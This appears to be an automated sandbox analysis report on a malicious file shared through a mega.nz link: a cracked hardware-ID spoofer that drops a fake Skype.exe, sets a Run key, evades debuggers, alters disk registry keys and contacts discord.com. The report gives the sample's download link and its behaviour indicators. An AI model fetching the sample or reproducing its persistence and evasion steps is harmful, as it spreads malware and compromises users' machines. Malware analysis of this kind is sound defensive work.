Analysis Overview
Threat Level: Known bad
The file https://mega.nz/file/QskTGapC#4yGsvZBpDx4vIyIwmA-0hV5EJTEWXyyyeejW7NKL0XQ was found to be: Known bad.
Malicious Activity Summary
Cerber
Enumerates VirtualBox DLL files
Stops running service(s)
Downloads MZ/PE file
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
UPX packed file
Themida packer
Maps connected drives based on registry
Enumerates connected drives
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Drops file in Windows directory
Enumerates physical storage devices
Runs ping.exe
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: LoadsDriver
Checks SCSI registry key(s)
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Delays execution with timeout.exe
Runs net.exe
Modifies registry class
Suspicious use of SendNotifyMessage
NTFS ADS
Gathers network information
Kills process with taskkill
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-08 17:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-08 17:21
Reported
2024-07-08 17:26
Platform
win10v2004-20240708-en
Max time kernel
244s
Max time network
227s
Command Line
Signatures
Cerber
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
Enumerates VirtualBox DLL files
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\windows\system32\vboxhook.dll | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
| File opened (read-only) | C:\windows\system32\vboxmrxnp.dll | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
| File opened (read-only) | C:\windows\system32\vboxhook.dll | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
| File opened (read-only) | C:\windows\system32\vboxmrxnp.dll | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Skype.sfx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Skype.sfx.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Service Host: SysMain = "C:\\Users\\Admin\\SolaraTab\\Skype.exe" | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\DriveCleanup.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\segwindrv.cat | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DevManView.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DevManView.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DevManView.exe | N/A |
| File created | C:\Windows\serials.bat | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\Spoofer.bat | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\Volumeid64.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\output.txt | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DevManView.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DevManView.exe | N/A |
| File created | C:\Windows\AMIDEWINx64.EXE | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\DevManView.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\segwindrvx64.sys | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\Taskkill_clean.bat | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\gen.py | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\kreyzecleaner.exe | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DeviceCleanupCmd.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DevManView.exe | N/A |
| File created | C:\Windows\devcon.exe | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DevManView.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DevManView.exe | N/A |
| File created | C:\Windows\AMIFLDRV64.SYS | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\DriveCleanup.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\python310._pth | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\sidchg64-3.0h.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\backgroundcleaner.bat | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\DeviceCleanupCmd.exe | C:\Windows\system32\curl.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0007 | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Address | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGuid | C:\Windows\DevManView.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\DevManView.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceReported | C:\Windows\DeviceCleanupCmd.exe | N/A |
